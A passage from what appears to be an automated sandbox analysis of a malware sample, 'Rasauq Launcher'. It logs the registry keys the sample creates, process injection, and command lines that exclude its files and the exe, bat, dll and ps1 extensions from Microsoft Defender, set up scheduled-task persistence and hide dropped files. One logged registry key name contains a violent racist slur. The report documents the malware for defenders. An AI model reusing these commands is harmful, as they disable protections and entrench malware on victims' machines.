Key created	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\Software\Software	reg.exe
Key created	\REGISTRY\USER\S-1-5-19	reg.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Classes\Local Settings\Software\Software	reg.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing\Software\Rasauq on top	reg.exe
Key created	\REGISTRY\USER\S-1-5-20	reg.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing\Software	reg.exe
Key created	\REGISTRY\USER\S-1-5-19\SOFTWARE\Classes	reg.exe
Key created	\REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing\Software\Rasauq on top	reg.exe
Key created	\REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Windows\CurrentVersion	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing\Software\Rasauq on top\	reg.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers	reg.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform\Software	reg.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-19\SOFTWARE\Software\Rasauq on top\	reg.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Classes	reg.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE	reg.exe
Key created	\REGISTRY\USER\S-1-5-19\SOFTWARE\Software\Rasauq on top	reg.exe
Key created	\REGISTRY\USER\S-1-5-19	reg.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Software\Rasauq on top	reg.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform\Software\Rasauq on top	reg.exe
Key created	\REGISTRY\USER\S-1-5-19\SOFTWARE	reg.exe
Key created	\REGISTRY\USER\S-1-5-19\SOFTWARE\Classes\Local Settings\Software\Software	reg.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE	reg.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Software\Rasauq on top\	reg.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\Software\Software\Rasauq on top\	reg.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing\Software\Rasauq on top\	reg.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows NT\CurrentVersion	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform\Software\Rasauq on top\	reg.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing\Software\Rasauq on top\	reg.exe

Modifies registry class 57 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-814918696-1585701690-3140955116-1000_Classes\Local Settings\Software\Software	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-814918696-1585701690-3140955116-1000_Classes\Local Settings\Software\Microsoft	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-814918696-1585701690-3140955116-1000_Classes\Local Settings\Software\Microsoft	reg.exe
Key created	\REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-814918696-1585701690-3140955116-1000\{0C08449F-748C-43B8-9D42-0B68F9D4E018}	msedge.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-814918696-1585701690-3140955116-1000_Classes\Local Settings\Software\Software\Rasauq on top\	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-814918696-1585701690-3140955116-1000_Classes\Local Settings\Software	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-814918696-1585701690-3140955116-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-814918696-1585701690-3140955116-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.contentdeliverymanager_cw5n1h2txyewy\Software\Software\Rasauq on top	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-814918696-1585701690-3140955116-1000_Classes\Local Settings	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-814918696-1585701690-3140955116-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.contentdeliverymanager_cw5n1h2txyewy\Software\Software	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-814918696-1585701690-3140955116-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-814918696-1585701690-3140955116-1000_Classes\Local Settings\Software\Microsoft\Windows	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-814918696-1585701690-3140955116-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-814918696-1585701690-3140955116-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.contentdeliverymanager_cw5n1h2txyewy\Software\Software\Rasauq on top\	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-814918696-1585701690-3140955116-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.contentdeliverymanager_cw5n1h2txyewy	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-814918696-1585701690-3140955116-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-814918696-1585701690-3140955116-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.contentdeliverymanager_cw5n1h2txyewy\Software\Software\Rasauq on top	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-814918696-1585701690-3140955116-1000_Classes\Local Settings	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-814918696-1585701690-3140955116-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-814918696-1585701690-3140955116-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-814918696-1585701690-3140955116-1000_Classes\Local Settings\Software\Software\Rasauq on top	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-814918696-1585701690-3140955116-1000_Classes\Local Settings\Software	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-814918696-1585701690-3140955116-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.contentdeliverymanager_cw5n1h2txyewy\Software	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-814918696-1585701690-3140955116-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Software\Rasauq on top	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-814918696-1585701690-3140955116-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-814918696-1585701690-3140955116-1000_Classes\Local Settings\Software\Software\Rasauq on top\	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-814918696-1585701690-3140955116-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-814918696-1585701690-3140955116-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Software	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-814918696-1585701690-3140955116-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Software\Rasauq on top\	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-814918696-1585701690-3140955116-1000_Classes\Local Settings\Software	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-814918696-1585701690-3140955116-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-814918696-1585701690-3140955116-1000_Classes\Local Settings\Software\Microsoft\Windows	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\	msedge.exe
Key created	\REGISTRY\USER\S-1-5-21-814918696-1585701690-3140955116-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eikKwN2EBJ1Cyr7HTF0\HKEY_LOCAL_MACHINE\SOFTWARE\Software\Rasauq on top	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-814918696-1585701690-3140955116-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-814918696-1585701690-3140955116-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik	reg.exe
Key created	\Registry\User\S-1-5-21-814918696-1585701690-3140955116-1000_Classes\Local Settings\Software\Software\Rasauq on top	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-814918696-1585701690-3140955116-1000_Classes\Local Settings\Software\Microsoft	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-814918696-1585701690-3140955116-1000_Classes\Local Settings\Software\Microsoft\Windows	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-814918696-1585701690-3140955116-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-814918696-1585701690-3140955116-1000_Classes\Local Settings	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-814918696-1585701690-3140955116-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-814918696-1585701690-3140955116-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\behead all niggers	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-814918696-1585701690-3140955116-1000_Classes\Local Settings\Software\Software\Rasauq on top	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-814918696-1585701690-3140955116-1000_Classes\Local Settings	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\behead all niggers\	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-814918696-1585701690-3140955116-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.contentdeliverymanager_cw5n1h2txyewy\Software\Software\Rasauq on top\	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-814918696-1585701690-3140955116-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-814918696-1585701690-3140955116-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-814918696-1585701690-3140955116-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-814918696-1585701690-3140955116-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Software\Rasauq on top	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-814918696-1585701690-3140955116-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-814918696-1585701690-3140955116-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-814918696-1585701690-3140955116-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-814918696-1585701690-3140955116-1000_Classes\Local Settings\Software	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-814918696-1585701690-3140955116-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Software\Rasauq on top\	reg.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 4 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

pid	Process
852	schtasks.exe
5888	schtasks.exe
2992	schtasks.exe
5856	schtasks.exe

Suspicious behavior: EnumeratesProcesses 49 IoCs

pid	Process
4408	powershell.exe
4408	powershell.exe
4688	powershell.exe
4688	powershell.exe
2700	sRasauq SoftWorks.exe
2700	sRasauq SoftWorks.exe
2700	sRasauq SoftWorks.exe
2700	sRasauq SoftWorks.exe
2700	sRasauq SoftWorks.exe
2700	sRasauq SoftWorks.exe
2700	sRasauq SoftWorks.exe
2700	sRasauq SoftWorks.exe
2700	sRasauq SoftWorks.exe
2700	sRasauq SoftWorks.exe
2700	sRasauq SoftWorks.exe
2700	sRasauq SoftWorks.exe
2700	sRasauq SoftWorks.exe
2700	sRasauq SoftWorks.exe
2700	sRasauq SoftWorks.exe
2700	sRasauq SoftWorks.exe
2700	sRasauq SoftWorks.exe
2700	sRasauq SoftWorks.exe
2700	sRasauq SoftWorks.exe
2700	sRasauq SoftWorks.exe
2700	sRasauq SoftWorks.exe
1948	powershell.exe
1948	powershell.exe
4456	powershell.exe
4456	powershell.exe
4456	powershell.exe
4916	powershell.exe
4916	powershell.exe
4916	powershell.exe
5540	powershell.exe
5540	powershell.exe
1516	powershell.exe
1516	powershell.exe
5892	powershell.exe
5892	powershell.exe
396	powershell.exe
396	powershell.exe
4868	powershell.exe
4868	powershell.exe
3328	powershell.exe
3328	powershell.exe
2452	msedge.exe
2452	msedge.exe
2452	msedge.exe
2452	msedge.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
3544	cmd.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 46 IoCs

pid	Process
1488	msedge.exe
1488	msedge.exe
1488	msedge.exe
1488	msedge.exe
1488	msedge.exe
1488	msedge.exe
1488	msedge.exe
1488	msedge.exe
1488	msedge.exe
1488	msedge.exe
1488	msedge.exe
1488	msedge.exe
1488	msedge.exe
1488	msedge.exe
1488	msedge.exe
1488	msedge.exe
1488	msedge.exe
1488	msedge.exe
1488	msedge.exe
1488	msedge.exe
1488	msedge.exe
1488	msedge.exe
1488	msedge.exe
1488	msedge.exe
1488	msedge.exe
1488	msedge.exe
1488	msedge.exe
1488	msedge.exe
1488	msedge.exe
1488	msedge.exe
1488	msedge.exe
1488	msedge.exe
1488	msedge.exe
1488	msedge.exe
1488	msedge.exe
1488	msedge.exe
1488	msedge.exe
1488	msedge.exe
1488	msedge.exe
1488	msedge.exe
1488	msedge.exe
1488	msedge.exe
1488	msedge.exe
1488	msedge.exe
1488	msedge.exe
1488	msedge.exe

Suspicious use of AdjustPrivilegeToken 49 IoCs

description	pid	Process
Token: SeDebugPrivilege	2716	Rasauq SoftWorks.exe
Token: SeDebugPrivilege	4408	powershell.exe
Token: SeBackupPrivilege	4564	vssvc.exe
Token: SeRestorePrivilege	4564	vssvc.exe
Token: SeAuditPrivilege	4564	vssvc.exe
Token: SeDebugPrivilege	4688	powershell.exe
Token: SeDebugPrivilege	2700	sRasauq SoftWorks.exe
Token: SeDebugPrivilege	1948	powershell.exe
Token: SeDebugPrivilege	4456	powershell.exe
Token: SeDebugPrivilege	2716	Rasauq SoftWorks.exe
Token: SeDebugPrivilege	5500	$77RealtekAudioDriverHost.exe
Token: SeDebugPrivilege	4916	powershell.exe
Token: SeDebugPrivilege	5540	powershell.exe
Token: SeDebugPrivilege	2104	taskkill.exe
Token: SeDebugPrivilege	1516	powershell.exe
Token: SeDebugPrivilege	5892	powershell.exe
Token: SeDebugPrivilege	396	powershell.exe
Token: SeDebugPrivilege	4868	powershell.exe
Token: SeDebugPrivilege	3328	powershell.exe
Token: SeDebugPrivilege	5932	taskkill.exe
Token: SeDebugPrivilege	5536	taskkill.exe
Token: SeDebugPrivilege	5648	taskkill.exe
Token: SeDebugPrivilege	2804	taskkill.exe
Token: SeDebugPrivilege	3304	taskkill.exe
Token: SeDebugPrivilege	1828	taskkill.exe
Token: SeDebugPrivilege	6000	taskkill.exe
Token: SeDebugPrivilege	6028	taskkill.exe
Token: SeDebugPrivilege	4120	taskkill.exe
Token: SeDebugPrivilege	4460	taskkill.exe
Token: SeDebugPrivilege	4916	taskkill.exe
Token: SeDebugPrivilege	3464	taskkill.exe
Token: SeDebugPrivilege	1224	taskkill.exe
Token: SeDebugPrivilege	4028	taskkill.exe
Token: SeDebugPrivilege	3788	taskkill.exe
Token: SeDebugPrivilege	5036	taskkill.exe
Token: SeDebugPrivilege	4992	taskkill.exe
Token: SeTakeOwnershipPrivilege	3800	takeown.exe
Token: SeShutdownPrivilege	4844	powercfg.exe
Token: SeCreatePagefilePrivilege	4844	powercfg.exe
Token: SeShutdownPrivilege	316	powercfg.exe
Token: SeCreatePagefilePrivilege	316	powercfg.exe
Token: SeShutdownPrivilege	4416	powercfg.exe
Token: SeCreatePagefilePrivilege	4416	powercfg.exe
Token: SeShutdownPrivilege	3504	powercfg.exe
Token: SeCreatePagefilePrivilege	3504	powercfg.exe
Token: SeShutdownPrivilege	1132	powercfg.exe
Token: SeCreatePagefilePrivilege	1132	powercfg.exe
Token: SeShutdownPrivilege	3584	powercfg.exe
Token: SeCreatePagefilePrivilege	3584	powercfg.exe

Suspicious use of FindShellTrayWindow 2 IoCs

pid	Process
5540	powershell.exe
1488	msedge.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 620 wrote to memory of 2716	620	Rasauq Launcher.exe	88
PID 620 wrote to memory of 2716	620	Rasauq Launcher.exe	88
PID 620 wrote to memory of 2700	620	Rasauq Launcher.exe	89
PID 620 wrote to memory of 2700	620	Rasauq Launcher.exe	89
PID 620 wrote to memory of 4924	620	Rasauq Launcher.exe	90
PID 620 wrote to memory of 4924	620	Rasauq Launcher.exe	90
PID 4924 wrote to memory of 1792	4924	cmd.exe	92
PID 4924 wrote to memory of 1792	4924	cmd.exe	92
PID 2716 wrote to memory of 4408	2716	Rasauq SoftWorks.exe	93
PID 2716 wrote to memory of 4408	2716	Rasauq SoftWorks.exe	93
PID 2716 wrote to memory of 4688	2716	Rasauq SoftWorks.exe	97
PID 2716 wrote to memory of 4688	2716	Rasauq SoftWorks.exe	97
PID 2716 wrote to memory of 1948	2716	Rasauq SoftWorks.exe	101
PID 2716 wrote to memory of 1948	2716	Rasauq SoftWorks.exe	101
PID 2716 wrote to memory of 4456	2716	Rasauq SoftWorks.exe	103
PID 2716 wrote to memory of 4456	2716	Rasauq SoftWorks.exe	103
PID 2700 wrote to memory of 3024	2700	sRasauq SoftWorks.exe	105
PID 2700 wrote to memory of 3024	2700	sRasauq SoftWorks.exe	105
PID 2700 wrote to memory of 5424	2700	sRasauq SoftWorks.exe	107
PID 2700 wrote to memory of 5424	2700	sRasauq SoftWorks.exe	107
PID 2716 wrote to memory of 852	2716	Rasauq SoftWorks.exe	109
PID 2716 wrote to memory of 852	2716	Rasauq SoftWorks.exe	109
PID 4924 wrote to memory of 2892	4924	cmd.exe	111
PID 4924 wrote to memory of 2892	4924	cmd.exe	111
PID 2700 wrote to memory of 5808	2700	sRasauq SoftWorks.exe	112
PID 2700 wrote to memory of 5808	2700	sRasauq SoftWorks.exe	112
PID 5808 wrote to memory of 1624	5808	cmd.exe	114
PID 5808 wrote to memory of 1624	5808	cmd.exe	114
PID 5808 wrote to memory of 5500	5808	cmd.exe	115
PID 5808 wrote to memory of 5500	5808	cmd.exe	115
PID 5500 wrote to memory of 3108	5500	$77RealtekAudioDriverHost.exe	118
PID 5500 wrote to memory of 3108	5500	$77RealtekAudioDriverHost.exe	118
PID 5500 wrote to memory of 5888	5500	$77RealtekAudioDriverHost.exe	120
PID 5500 wrote to memory of 5888	5500	$77RealtekAudioDriverHost.exe	120
PID 5500 wrote to memory of 1464	5500	$77RealtekAudioDriverHost.exe	122
PID 5500 wrote to memory of 1464	5500	$77RealtekAudioDriverHost.exe	122
PID 5500 wrote to memory of 4916	5500	$77RealtekAudioDriverHost.exe	124
PID 5500 wrote to memory of 4916	5500	$77RealtekAudioDriverHost.exe	124
PID 5500 wrote to memory of 2992	5500	$77RealtekAudioDriverHost.exe	126
PID 5500 wrote to memory of 2992	5500	$77RealtekAudioDriverHost.exe	126
PID 4924 wrote to memory of 3544	4924	cmd.exe	129
PID 4924 wrote to memory of 3544	4924	cmd.exe	129
PID 3544 wrote to memory of 1828	3544	cmd.exe	131
PID 3544 wrote to memory of 1828	3544	cmd.exe	131
PID 3544 wrote to memory of 5540	3544	cmd.exe	132
PID 3544 wrote to memory of 5540	3544	cmd.exe	132
PID 3544 wrote to memory of 4712	3544	cmd.exe	133
PID 3544 wrote to memory of 4712	3544	cmd.exe	133
PID 3544 wrote to memory of 3908	3544	cmd.exe	134
PID 3544 wrote to memory of 3908	3544	cmd.exe	134
PID 3544 wrote to memory of 4232	3544	cmd.exe	135
PID 3544 wrote to memory of 4232	3544	cmd.exe	135
PID 3544 wrote to memory of 4432	3544	cmd.exe	136
PID 3544 wrote to memory of 4432	3544	cmd.exe	136
PID 3544 wrote to memory of 1536	3544	cmd.exe	137
PID 3544 wrote to memory of 1536	3544	cmd.exe	137
PID 3544 wrote to memory of 4792	3544	cmd.exe	138
PID 3544 wrote to memory of 4792	3544	cmd.exe	138
PID 3544 wrote to memory of 4700	3544	cmd.exe	139
PID 3544 wrote to memory of 4700	3544	cmd.exe	139
PID 3544 wrote to memory of 5064	3544	cmd.exe	140
PID 3544 wrote to memory of 5064	3544	cmd.exe	140
PID 3544 wrote to memory of 280	3544	cmd.exe	141
PID 3544 wrote to memory of 280	3544	cmd.exe	141

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware

Views/modifies file attributes 1 TTPs 2 IoCs

Hidden Files and Directories

T1564.001

pid	Process
3024	attrib.exe
5424	attrib.exe

C:\Users\Admin\AppData\Local\Temp\Rasauq Launcher.exe
"C:\Users\Admin\AppData\Local\Temp\Rasauq Launcher.exe"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:620
- C:\Users\Admin\AppData\Local\Temp\Rasauq SoftWorks.exe
  "C:\Users\Admin\AppData\Local\Temp\Rasauq SoftWorks.exe"
  2⤵
  - Checks computer location settings
  - Drops startup file
  - Executes dropped EXE
  - Adds Run key to start application
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2716
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Rasauq SoftWorks.exe'
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:4408
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Rasauq SoftWorks.exe'
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:4688
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Windows Host Service.scr'
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1948
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Windows Host Service.scr'
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:4456
- - C:\Windows\System32\schtasks.exe
    "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Windows Host Service" /tr "C:\Users\Admin\AppData\Local\Windows Host Service.scr"
    3⤵
    - Scheduled Task/Job: Scheduled Task
    PID:852
- C:\Users\Admin\AppData\Local\Temp\sRasauq SoftWorks.exe
  "C:\Users\Admin\AppData\Local\Temp\sRasauq SoftWorks.exe"
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - Adds Run key to start application
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2700
- - C:\Windows\System32\attrib.exe
    "C:\Windows\System32\attrib.exe" +s +h "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\Realtek Audio Driver Host"
    3⤵
    - Sets file to hidden
    - Views/modifies file attributes
    PID:3024
- - C:\Windows\System32\attrib.exe
    "C:\Windows\System32\attrib.exe" +s +h "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\Realtek Audio Driver Host\$77RealtekAudioDriverHost.exe"
    3⤵
    - Sets file to hidden
    - Views/modifies file attributes
    PID:5424
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmpB788.tmp.bat""
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:5808
  - - C:\Windows\system32\timeout.exe
      timeout 3
      4⤵
      Delays execution with timeout.exe
      PID:1624
  - - C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\Realtek Audio Driver Host\$77RealtekAudioDriverHost.exe
      "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\Realtek Audio Driver Host\$77RealtekAudioDriverHost.exe"
      4⤵
      Checks computer location settings
      Executes dropped EXE
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:5500
    - - C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks.exe" /query /TN $77RealtekAudioDriverHost.exe
        5⤵
        
        PID:3108
    - - C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks.exe" /Create /SC ONCE /TN "$77RealtekAudioDriverHost.exe" /TR "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\Realtek Audio Driver Host\$77RealtekAudioDriverHost.exe \"\$77RealtekAudioDriverHost.exe\" /AsAdmin" /ST 00:01 /IT /F /RL HIGHEST
        5⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:5888
    - - C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks.exe" /query /TN $77RealtekAudioDriverHost.exe
        5⤵
        
        PID:1464
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -ExclusionExtension exe,bat,dll,ps1;exit
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4916
    - - C:\Windows\System32\schtasks.exe
        
